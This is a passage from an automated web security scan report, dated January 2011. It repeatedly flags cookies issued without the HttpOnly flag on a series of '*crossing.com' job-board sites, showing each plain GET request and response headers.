<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.28. http://www.businessdevelopmentcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.businessdevelopmentcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.businessdevelopmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ru1216s8gi6hento64jtdlqce3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116452

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.29. http://www.callcentercrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.callcentercrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.callcentercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=prr05v672vhpd9l46bt5lu88r3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128551

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.30. http://www.chefcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.chefcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.chefcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ha4et9frtsniged97g2n86qvf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108888

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.31. http://www.civilengineeringcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.civilengineeringcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.civilengineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=soga8db6spril7hls6mrahaid5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106801

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.32. http://www.clevelcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clevelcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.clevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:10 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7grpnh4ane7h6vq7m94a09osd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 115509

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.33. http://www.clinicalresearchcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clinicalresearchcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.clinicalresearchcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pot86ho5ls3u8ap2dd0c7javd7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101472

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.34. http://www.compliancecrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.compliancecrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.compliancecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t20irb9usa5ru4jlcuufdl43b5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135192

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.35. http://www.computeraideddesigncrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.computeraideddesigncrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.computeraideddesigncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i4i09jl3sjo0digpp5qe6oqa75; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121001

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.36. http://www.constructioncrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.constructioncrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.constructioncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6c5ho2kr4aaj7if0r37e83a520; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 131637

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.37. http://www.consultingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.consultingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.consultingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cd981ht9vh5kim10q4v8a0ih67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111912

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.38. http://www.contractmanagementcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.contractmanagementcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.contractmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fsi5mhj5680mc16iu88s1m9v73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111832

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.39. http://www.counselingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.counselingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.counselingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=lgk9crdg1goruniholj5urn963; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149300

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.40. http://www.cpluspluscrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cpluspluscrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.cpluspluscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:52 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=j0ddtd9qvkbq5g8p17jjmqsi44; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114789

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.41. http://www.customerservicecrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.customerservicecrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.customerservicecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e126ahin8nno4266rg114hr8q7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.42. http://www.dbacrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dbacrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.dbacrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ks0hq7i64reib4jv7s3j12ces0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125721

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.43. http://www.dentalcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dentalcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.dentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=od1eunkj1a6cadocmt8bfbgt55; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
